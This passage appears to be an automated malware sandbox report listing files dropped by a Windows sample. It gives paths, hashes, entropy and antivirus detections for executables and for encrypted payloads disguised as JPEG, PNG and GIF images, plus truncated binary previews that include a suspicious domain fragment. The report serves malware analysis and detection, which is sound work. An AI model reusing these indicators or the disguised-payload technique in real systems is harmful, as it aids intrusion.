Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\2U36F\utils.vcxproj

Download File

Process:	C:\Program Files (x86)\qNHTRl\qNHTRl.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.999399133834538
Encrypted:	true
SSDEEP:	6144:NiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:E8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	CE3093DF055157AE35226A50BD7C5BB5
SHA1:	2F32CC9DB5E00BAA21D7CDEB93EFF00D797493D5
SHA-256:	D7C7B668A59F77AC0B3D76DA9E2D7FC05040F2C2F791D7EFBAB9AC63C9F6F6E1
SHA-512:	5C593C3A90D5C460004ECF852E43478960BFF1EF47E35FE2E1A628D88C57092EC0F9420F853AB0F6EBF610E0AC23A6666B026C73C9784A3F9F587FBB2F18D89E
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()456789:CDEF8.217.59.73......"ijstuvwxyz....oheykp.net......3#..............59.73.....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Program Files (x86)\qNHTRl\log.src

Download File

Process:	C:\Users\user\Documents\7tqorj.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5059989
Entropy (8bit):	7.999955224615887
Encrypted:	true
SSDEEP:	98304:uOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:Bo6T1MFhE/7qJwBP6TWtttriYE7kjv
MD5:	AF88F4204B40699D7CE6422E7BC9534D
SHA1:	8C2EC935EAF6793583E8E0F04D8BEBF764E9C375
SHA-256:	D31FA56E1C61B8F91B73B4640BFD1DA255B2251C0BAE3175A4493C5EFEBA8ABC
SHA-512:	EAAAB6191EDECEC731164C88AAD82799B45D4A583BA33326625FC3DBB4B44474D2F203710FAEA9761948D38CB3A7C1D47BD145CC69AFE000AC62B00D23DADF7B
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Program Files (x86)\qNHTRl\qNHTRl.exe

Download File

Process:	C:\Users\user\Documents\7tqorj.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\qNHTRl\tbcore3U.dll

Download File

Process:	C:\Users\user\Documents\7tqorj.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.9925172539995515
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/F:9S4+O6P5OeMRrjRy7aPZbm3k8V/F
MD5:	08793ABDBAD9DC07E76A78218959CAA6
SHA1:	59F1F8E6F0E60768C4AD9C1D2E799619DCAD87FF
SHA-256:	BF21E77CE487D306A60CBDCEA3D03962A878B18358E757EDE1E21E295B5E16B1
SHA-512:	8A8F104FF344D6B0F6F45DAEEA82882862C0D8689A82E2D65EC4F905BF8AFBAC93CBCCDE033C5CBCE161EB33DFB772C09F8F352936173600D93FBF93FD30F2B3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\qNHTRl\utils.vcxproj

Download File

Process:	C:\Users\user\Documents\7tqorj.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.999399006173634
Encrypted:	true
SSDEEP:	6144:xiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:A8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	93665BC9901E42E672C7E32A0BC91AD4
SHA1:	F02522D0CECECF1A842931F93648E4A84B934772
SHA-256:	7205DAA25ED8E79D6F21FFD6EDA1506A7242D4B540245BFDD66D17906D07F1D8
SHA-512:	CB2E4ED57D6B964C96BA44C83EA7CA16B50A3B9B82C784F42B5FF09C4B7BE0A049A169DC768B12EE61856EBBACDA5F99A47277BF0D2021332267A5B30AD7F8BB
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()456789:CDEF8.217.59.73......"ijstuvwxyz....oheykp.net......3#..............59.73.....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\Public\Music\destopbak.ini

Download File

Process:	C:\Users\user\Documents\7tqorj.exe
File Type:	MIPSEB MIPS-III ECOFF executable
Category:	modified
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:s:s
MD5:	7E74F75663E5B5A4F3452A4C603EE45D
SHA1:	D5114B086B721F2C87EA7152025792958AB4C629
SHA-256:	DD1E2826C0124A6D4F7397A5A71F633928926C0608B62FB9E615BA778ACC39FF
SHA-512:	2F5D0D45593487BEBC2CCF968EAF2A4A3BDE1D5A29C7C2B5AD411E041C0D3B7A46BE439ED7083093057A96030683B9DEFBED1A2EF7882B3E64CF3FBC7C9CF12F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	.@

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\FOM-51[1].jpg

Download File

Process:	C:\Users\user\Documents\7tqorj.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	4859125
Entropy (8bit):	7.999956261017207
Encrypted:	true
SSDEEP:	98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
MD5:	EE6CA3EEA7F9B1C81059AEF570A28C02
SHA1:	14EFBF498356644D9B1327407E3F03E1BFBEA363
SHA-256:	A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
SHA-512:	563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\b[1].gif

Download File

Process:	C:\Users\user\Desktop\2749837485743-7684385786.05.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	125333
Entropy (8bit):	7.993522712936246
Encrypted:	true
SSDEEP:	3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
MD5:	2CA9F4AB0970AA58989D66D9458F8701
SHA1:	FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
SHA-256:	5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
SHA-512:	AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\s[1].jpg

Download File

Process:	C:\Users\user\Desktop\2749837485743-7684385786.05.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	8299
Entropy (8bit):	7.9354275320361545
Encrypted:	false
SSDEEP:	192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
MD5:	9BDB6A4AF681470B85A3D46AF5A4F2A7
SHA1:	D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
SHA-256:	5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
SHA-512:	5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE...............CHI........[..>G..C..&.!7..E..)U&.$...z.tuv......?..............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FOM-53[1].jpg

Download File

Process:	C:\Users\user\Documents\7tqorj.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	366410
Entropy (8bit):	7.375315637594966
Encrypted:	false
SSDEEP:	6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
MD5:	DA1D5EB665D3AAD523BE59415E6449ED
SHA1:	40C310E82035381410B83E4F1DA0A4410FEB8FE6
SHA-256:	F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
SHA-512:	6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\d[1].gif

Download File

Process:	C:\Users\user\Desktop\2749837485743-7684385786.05.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	3892010
Entropy (8bit):	7.995495589600101
Encrypted:	true
SSDEEP:	98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
MD5:	E4E46F3980A9D799B1BD7FC408F488A3
SHA1:	977461A1885C7216E787E5B1E0C752DC2067733A
SHA-256:	6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
SHA-512:	9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\f[1].dat

Download File

Process:	C:\Users\user\Documents\7tqorj.exe
File Type:	data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	4.5851931774575325
Encrypted:	false
SSDEEP:	6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
MD5:	E54C4296F011EC91D935AA353C936E34
SHA1:	53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
SHA-256:	81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
SHA-512:	5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
Malicious:	false
Preview:	.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\i[1].dat

Download File

Process:	C:\Users\user\Desktop\2749837485743-7684385786.05.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.26296536154187
Encrypted:	false
SSDEEP:	6:WwgONBui9QCrR0CrCa2BIDR/pYeL1g87OdUzW9E40/qcX:PgONBuUQCrZMBIDRb1gmgUzWg3
MD5:	3F830864D62708390D84A4629D88083D
SHA1:	79A9BB07FED0DB63C4B671000DD4069AB02ED5C3
SHA-256:	9303E0E29A2AC53C31D43FC98C828A1FEB5814D2078EB868FE19CCB324D2C263
SHA-512:	5DF33762B5D709E05272CD01C3B43A01671938A3F9D4DE9911EE8EF12FE89F8958493CCDFB23F940FE493B95F01A677D58F73FAACF0FC7D8C2FD5C9EA9DDD8A1
Malicious:	false
Preview:	....l%00XE.G#vi([[.K%f).GDG@'n!,EUYB!1l!NL.@n')&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyy..L.j? a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33[F.D uj+XX.H&e*-DGDC$m"/FVZA"2o"MO.Ao&('''''''''''''''''''''''''''''''''OSSW$mxx..M.k>!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6\|ylllllllllllllllllllllllllllllllllllll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\FOM-50[1].jpg

Download File

Process:	C:\Users\user\Documents\7tqorj.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	55085
Entropy (8bit):	7.99273647746538
Encrypted:	true
SSDEEP:	1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
MD5:	DC44AE348E6A74B3A74871020FDFAC74
SHA1:	B223020A5F82FF15FD5E4930477F38F34C9CB919
SHA-256:	48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
SHA-512:	5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~..a.....=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\a[1].gif

Download File

Process:	C:\Users\user\Desktop\2749837485743-7684385786.05.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	135589
Entropy (8bit):	7.995304392539578
Encrypted:	true
SSDEEP:	3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
MD5:	0DDD3F02B74B01D739C45956D8FD12B7
SHA1:	561836F6228E24180238DF9456707A2443C5795C
SHA-256:	2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
SHA-512:	0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\s[1].dat

Download File

Process:	C:\Users\user\Desktop\2749837485743-7684385786.05.exe
File Type:	data
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	7.711602399715616
Encrypted:	false
SSDEEP:	384:9qegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQq:J5F1FUdy422IK+gAZt2i0YPpQn4GMN
MD5:	118BC88C54125F7AD49C190766A982DD
SHA1:	0CD10C14C1C0E3704F5F0DF6B71F7ADC3C138C2D
SHA-256:	9F758E11F23A7C256AE4955A406D8EFC51840BC6D7128F9B007CAF9EF7781132
SHA-512:	7B9D47CEADCD600825C3F29E35DA493D81ADD9AB54DF7A003EE1525A4B46BF485B21AFCD1892562244D9A9B392D29C8B838780F1DD3400274338F403258B2501
Malicious:	false
Preview:	..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.\|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\FOM-52[1].jpg

Download File

Process:	C:\Users\user\Documents\7tqorj.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5062442
Entropy (8bit):	7.999518892518095
Encrypted:	true
SSDEEP:	98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
MD5:	70C21DA900796B279A09040B00953E40
SHA1:	7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
SHA-256:	901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
